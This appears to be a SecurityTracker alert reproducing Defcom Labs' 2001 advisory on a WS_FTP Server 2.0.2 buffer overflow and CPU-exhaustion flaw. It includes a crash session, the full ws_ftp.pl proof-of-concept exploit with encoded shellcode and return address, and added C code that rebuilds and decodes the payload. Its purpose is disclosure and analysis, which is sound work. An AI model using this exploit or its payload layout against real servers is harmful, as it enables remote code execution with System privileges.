Ipswitch's WS_FTP Server Will Execute Remotely-Supplied Arbitrary Code, Typically With System Privileges

SecurityTracker Alert ID: 1002090
SecurityTracker URL: http://securitytracker.com/id/1002090
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 27 2001
Impact: Denial of service via network, Execution of arbitrary code via network, Root access via network
Fix Available: Yes   Vendor Confirmed: Yes   Exploit Included: Yes
Version(s): 2.0.2; possibly earlier versions
Description:
Defcom Labs reported a vulnerability in Ipswitch WS_FTP Server that allows a remote, authenticated user to execute arbitrary code on the server, typically with System privileges because the server runs as a service by default. A separate flaw lets a remote user drive the service to 100% CPU.
The buffer overflow can reportedly be triggered by a valid remote user (including the anonymous user) through any of the following commands, which appear to share one argument-parsing routine: DELE, MDTM, MLST, MKD, RMD, RNFR, RNTO, SIZE, STAT, XMKD, and XRMD.
Sending one of these commands with an argument of at least 478 bytes (474 bytes of filler followed by 4 bytes that become the new return address) overruns a fixed-size stack buffer and overwrites the saved return address, so the attacker controls EIP. Defcom's advisory adds the qualification that this was only valid when logged in as the anonymous user, not as an ordinary one.
It is also reported that a remote user with a valid FTP account (including anonymous access) can send a few NUL (0x00) bytes to make the WS_FTP Server consume 100% of the CPU.
A demonstration exploit script is included in the Source Message.

Impact:
A remote user with FTP account access (including anonymous access) can execute arbitrary code on the server, typically with System privileges, giving the remote user System-level access to the operating system. The remote user may also be able to cause the service to consume all available CPU.
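The overflow described above has the classic shape: one argument-copying routine shared by eleven commands, a fixed-size stack buffer, and no length check before the copy. The following C is an added illustration of that bug next to its fix; it is not Ipswitch's code and not part of the Defcom advisory. The 474-byte buffer size is taken from the advisory's return-address offset, and the function names, verb table and reply strings are assumptions for illustration.

```c
/*
 * Added example, not Ipswitch code: a model of the argument-parsing path the
 * advisory says the listed commands share, in a vulnerable form and a
 * hardened form. Assumed for illustration: the 474-byte buffer (the
 * advisory's EIP offset), the function names and the reply texts.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARG_BUF  474   /* assumed: the advisory puts the saved EIP 474 bytes into the argument */
#define VERB_MAX 8

/* The verbs Defcom reports as affected. */
static const char *const SHARED_PARSER_VERBS[] = {
    "DELE", "MDTM", "MLST", "MKD", "RMD", "RNFR", "RNTO",
    "SIZE", "STAT", "XMKD", "XRMD", NULL
};

int verb_uses_shared_parser(const char *verb)
{
    for (const char *const *p = SHARED_PARSER_VERBS; *p; ++p)
        if (strcmp(*p, verb) == 0) return 1;
    return 0;
}

/* Splits "verb arg\r\n" into an upper-cased verb and a pointer to the
 * argument text. Returns -1 if the verb alone would not fit. */
int split_command(const char *line, char *verb, size_t verbsz, const char **arg)
{
    size_t i = 0;
    while (line[i] && line[i] != ' ' && line[i] != '\r' && line[i] != '\n') {
        if (i + 1 >= verbsz) return -1;
        verb[i] = (char)toupper((unsigned char)line[i]);
        i++;
    }
    verb[i] = '\0';
    while (line[i] == ' ') i++;
    *arg = line + i;
    return 0;
}

/* Vulnerable model: unbounded copy into a fixed stack buffer. A 478-byte
 * argument runs 4 bytes past 'arg'; on the advisory's target those 4 bytes
 * land on the saved return address. Only ever called with short input here,
 * because overflowing it is undefined behaviour. */
size_t copy_arg_vulnerable(const char *argument)
{
    char arg[ARG_BUF];
    strcpy(arg, argument);                  /* the bug: no length check */
    return strlen(arg);
}

/* Hardened model: measure first, refuse anything that would not fit with its
 * terminator, then copy with an explicit bound. Returns the FTP reply code. */
int handle_command_hardened(const char *line, char *reply, size_t replysz)
{
    char verb[VERB_MAX];
    const char *argument;
    char arg[ARG_BUF];
    size_t n;

    if (split_command(line, verb, sizeof verb, &argument) != 0) {
        snprintf(reply, replysz, "500 Syntax error, command unrecognized");
        return 500;
    }
    if (!verb_uses_shared_parser(verb)) {
        snprintf(reply, replysz, "502 Command not implemented in this model");
        return 502;
    }
    n = strcspn(argument, "\r\n");          /* argument length without the line ending */
    if (n == 0) {
        snprintf(reply, replysz, "501 Syntax error in parameters: argument required");
        return 501;
    }
    if (n >= sizeof arg) {                  /* leave room for the NUL */
        snprintf(reply, replysz, "501 Syntax error in parameters: argument too long (%zu bytes)", n);
        return 501;
    }
    memcpy(arg, argument, n);
    arg[n] = '\0';
    /* A real server would now validate the path and act on it. */
    snprintf(reply, replysz, "200 %s accepted a %zu-byte argument", verb, n);
    return 200;
}

/* Builds "VERB " + n fill bytes + CRLF, the shape of the advisory's test. Caller frees. */
char *make_command(const char *verb, size_t n, char fill)
{
    size_t vl = strlen(verb);
    char *line = malloc(vl + 1 + n + 3);
    if (!line) return NULL;
    memcpy(line, verb, vl);
    line[vl] = ' ';
    memset(line + vl + 1, fill, n);
    memcpy(line + vl + 1 + n, "\r\n", 3);
    return line;
}

int main(void)
{
    char reply[128];
    char *ok  = make_command("DELE", 20, 'A');
    char *bad = make_command("DELE", 478, 'A');   /* 474 + 4, as in the advisory */
    handle_command_hardened(ok, reply, sizeof reply);  puts(reply);
    handle_command_hardened(bad, reply, sizeof reply); puts(reply);
    free(ok);
    free(bad);
    return 0;
}
```

The hardened version rejects the advisory's 478-byte DELE argument with a 501 reply before any copy takes place, and the bound is checked against the destination's real size rather than a number chosen to "look big enough"; the same routine serves every verb in the table, which is the point of fixing a shared parser once rather than per command.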

Solution:
The vendor has released a patch. See the Vendor URL to obtain the patch.

Vendor URL: http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html

Cause:
Boundary error (a fixed-size buffer in the command-argument parser is overrun by an over-long argument)

Underlying OS:
Windows; the source advisory tested Windows 2000 Professional and Server at any service pack.

Message History:
None.

Source Message Contents

Date: Thu, 26 Jul 2001 13:25:13 +0100
Subject: def-2001-28 - WS_FTP server 2.0.2 Buffer Overflow and possible DOS

======================================================================
Defcom Labs Advisory def-2001-28
WS_FTP server 2.0.2 Buffer Overflow and possible DOS
Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-07-26
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.2 contains a buffer overflow which affects the
following commands:
* DELE
* MDTM
* MLST
* MKD
* RMD
* RNFR
* RNTO
* SIZE
* STAT
* XMKD
* XRMD
This buffer overflow gives an attacker the ability to run code on
the target with SYSTEM RIGHTS, due to the fact that the server runs
as a service by default. Note: this is only valid when logged in as
an anonymous user, not an ordinary one.
The server also contains an easy-to-trigger DOS.
------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.2, haven't tested other versions
----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
All the above-mentioned commands seem to be using the same parsing
code which suffers from a buffer overflow. By sending a command with
an argument greater than 478 (474 bytes + new return address) bytes,
a buffer will overflow and the EIP will be overwritten. A
proof-of-concept exploit is attached to the advisory, which works
against WS_FTP server 2.0.2 running on WIN2K (Professional and
Server, any SP).
C:\tools\web>nc -nvv 127.0.0.1 21
(UNKNOWN) [127.0.0.1] 21 (?) open
220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
220-Tue Jun 19 14:00:21 2001
220-30 days remaining on evaluation.
220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520)
user ftp
331 Password required
pass ftp
230 user logged in
DELE AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0
eip=41414141 esp=0104df88 ebp=41414141 iopl=0         nv up ei pl zr na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00010246
* Possible DOS
By sending a couple of NULL(0x0) characters, the WS_FTP Server
will spike at 100% CPU.
---------------------------=[Workaround]=-----------------------------
Download the new version from:
http://www.ipswitch.com/Support/WS_FTP-Server/patch-upgrades.html
-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp.pl
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendor's attention on the 18th of
June, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com www.defcom.com
======================================================================
Attachment: ws_ftp.pl (application/x-perl)
#!/usr/local/bin/perl
#########################################################################
#
# WS_FTP Server 2.0.2 DELE proof-of-concept exploit
# By andreas@defcom.com and janne@defcom.com (C)2001
#
#########################################################################
use strict;
use warnings;
use Socket;

my $login = "ftp"; # username (anonymous login)
my $pass  = "ftp"; # password
#########################################################################
my $ARGC = @ARGV;
if ($ARGC != 1) {
    print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n";
    print "It creates a file named defcom.iyd in the c-root\n";
    print "(C)2001 andreas\@defcom.com\n";
    print "Usage: $0 <host>\n";
    print "Example: $0 127.0.0.1\n";
    exit;
}

# Plain TCP connection to the FTP control port.
my ($remote, $port, $iaddr, $paddr, $proto);
$remote = $ARGV[0];
$port   = "21";
$iaddr  = inet_aton($remote) or die "Error: $!";
$paddr  = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto  = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
sleep(1);

# Log in as the anonymous user. Server replies are never read, hence the sleeps.
my $msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";

# Payload. As disassembled from the bytes, the first 24 bytes are a decoder
# (add eax,0x18; mov cx,0x8142; xor cx,0x8080; xor byte [eax],0x95; inc eax;
# loop) that XORs the 450 bytes following it with 0x95; the remainder is the
# XOR-encoded code.
my $sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76";
$sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55";
$sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95";
$sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83";

# DELE argument layout, offsets from the start of the argument:
#   0..101    $sploit (decoder + encoded code)
#   102..459  0xd4 filler (0xd4 ^ 0x95 = 0x41, inc ecx) up to 460 bytes
#   460..473  14 encoded bytes; "c:\defcom.iyd\0" once decoded
#   474..477  new return address 0x7754a3ab (little-endian) over the saved EIP
#   478..493  16 bytes of 0xd4 padding
#   494..509  stub: mov eax,esp; sub eax,0x7f (three times); sub eax,0x71;
#             jmp eax, i.e. jump 0x1ee (494) bytes below esp, which is the
#             distance from this stub back to the decoder at offset 0
$msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95";
$msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
exit;
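The ws_ftp.pl script above builds its DELE argument from an encoded payload, 0xd4 filler, a 4-byte return address, 16 pad bytes and a trailing jump stub, and the advisory says only that the payload "creates a file named defcom.iyd in the c-root". The following C program is added here as an analysis aid; it is not part of the advisory or the exploit. It reassembles the argument from the byte strings in the script, reads the decoder parameters out of the payload's first 24 bytes (the editor's reading of those bytes is add eax,0x18; mov cx,0x8142; xor cx,0x8080; xor byte [eax],0x95; inc eax; loop, so 450 bytes starting at offset 24 are XORed with 0x95), applies that loop, and returns the plaintext that sits immediately before the return address. That disassembly is the only assumption beyond the bytes on the page; what the decoded code does after it runs is not analysed here.

```c
/*
 * Added example: rebuilds the DELE argument from ws_ftp.pl and undoes the
 * XOR encoding applied by the payload's leading 24-byte decoder. The decoder
 * parameters are read from the bytes themselves (editor's disassembly:
 * add eax,0x18 / mov cx,0x8142 / xor cx,0x8080 / xor byte [eax],0x95 /
 * inc eax / loop). Not Ipswitch or Defcom code.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Byte strings copied from ws_ftp.pl, in the order the script concatenates them. */
static const uint8_t SPLOIT[] = {
    0x8b,0xd8,0x8b,0xf8,0x83,0xc0,0x18,0x33,0xc9,0x66,0xb9,0x42,0x81,0x66,
    0x81,0xf1,0x80,0x80,0x80,0x30,0x95,0x40,0xe2,0xfa,0xde,0x1e,0x76,
    0x1e,0x7e,0x2e,0x95,0x6f,0x95,0x95,0xc6,0xfd,0xd5,0x95,0x95,0x95,0x2b,
    0x49,0x81,0xd0,0x95,0x6a,0x83,0x96,0x56,0x1e,0x75,0x1e,0x7d,0xa6,0x55,
    0xc5,0xfd,0x15,0x95,0x95,0x95,0xff,0x97,0xc5,0xc5,0xfd,0x95,0x95,0x95,
    0x85,0x14,0x52,0x59,0x94,0x95,0x95,0xc2,0x2b,0xb1,0x80,0xd0,0x95,
    0x6a,0x83,0xc5,0x2b,0x6d,0x81,0xd0,0x95,0x6a,0x83,0xa6,0x55,0xc5,0x2b,
    0x85,0x83,0xd0,0x95,0x6a,0x83
};
static const uint8_t TAIL14[]  = { 0xf6,0xaf,0xc9,0xf1,0xf0,0xf3,0xf6,0xfa,
                                   0xf8,0xbb,0xfc,0xec,0xf1,0x95 };
static const uint8_t RETADDR[] = { 0xab,0xa3,0x54,0x77 };
static const uint8_t STUB[]    = { 0x8b,0xc4, 0x83,0xe8,0x7f, 0x83,0xe8,0x7f,
                                   0x83,0xe8,0x7f, 0x83,0xe8,0x71, 0xff,0xe0 };

#define FILL_BYTE 0xd4
#define FILL_TO   460      /* the script pads SPLOIT with 0xd4 up to 460 bytes */
#define ARG_LEN   (FILL_TO + sizeof TAIL14 + sizeof RETADDR + 16 + sizeof STUB)

/* Rebuilds the argument exactly as the Perl concatenation does. Returns its length. */
size_t build_argument(uint8_t *out, size_t outsz)
{
    size_t n = 0;
    if (outsz < ARG_LEN) return 0;
    memcpy(out + n, SPLOIT, sizeof SPLOIT);          n += sizeof SPLOIT;
    memset(out + n, FILL_BYTE, FILL_TO - n);         n  = FILL_TO;
    memcpy(out + n, TAIL14, sizeof TAIL14);          n += sizeof TAIL14;   /* 474 */
    memcpy(out + n, RETADDR, sizeof RETADDR);        n += sizeof RETADDR;  /* 478 */
    memset(out + n, FILL_BYTE, 16);                  n += 16;              /* 494 */
    memcpy(out + n, STUB, sizeof STUB);              n += sizeof STUB;     /* 510 */
    return n;
}

/* Decoder parameters pulled out of the first 24 bytes:
 *   83 c0 18        add eax,0x18      -> encoded data starts at +0x18
 *   66 b9 42 81     mov cx,0x8142
 *   66 81 f1 80 80  xor cx,0x8080     -> loop count 0x01c2 = 450
 *   80 30 95        xor byte [eax],0x95
 *   40 / e2 fa      inc eax ; loop */
struct decoder { size_t start; size_t count; uint8_t key; };

struct decoder read_decoder(const uint8_t *arg)
{
    struct decoder d;
    d.start = arg[6];
    d.count = (size_t)((arg[11] | arg[12] << 8) ^ (arg[16] | arg[17] << 8));
    d.key   = arg[20];
    return d;
}

/* Applies the decoder's XOR loop in place; returns the number of bytes touched. */
size_t decode_in_place(uint8_t *arg, size_t len)
{
    struct decoder d = read_decoder(arg);
    if (d.start + d.count > len) return 0;
    for (size_t i = 0; i < d.count; i++)
        arg[d.start + i] ^= d.key;
    return d.count;
}

/* Rebuilds, decodes, and returns the string at offset 460 (the 14 bytes
 * immediately before the return address). */
const char *recovered_tail(uint8_t *buf, size_t bufsz)
{
    size_t n = build_argument(buf, bufsz);
    if (n == 0 || decode_in_place(buf, n) == 0) return NULL;
    return (const char *)buf + FILL_TO;
}

int main(void)
{
    uint8_t buf[ARG_LEN];
    struct decoder d = read_decoder(SPLOIT);
    const char *s = recovered_tail(buf, sizeof buf);
    printf("argument length %zu; decoder xors %zu bytes from +%zu with 0x%02x\n",
           (size_t)ARG_LEN, d.count, d.start, (unsigned)d.key);
    printf("string before the return address: \"%s\"\n", s ? s : "(none)");
    printf("filler 0x%02x decodes to 0x%02x\n", (unsigned)FILL_BYTE, (unsigned)(FILL_BYTE ^ d.key));
    return 0;
}
```

Two details fall out of running this. The loop count 450 is exactly 474 minus 24, so the decoder covers everything from the end of itself up to, but not including, the return address; that is why the return address and the jump stub are stored raw while the filler and the path string are encoded. The 0x1ee the stub subtracts from esp equals the distance from the stub (offset 494) back to the decoder at offset 0, so the exploit relies on esp pointing at the stub when it runs.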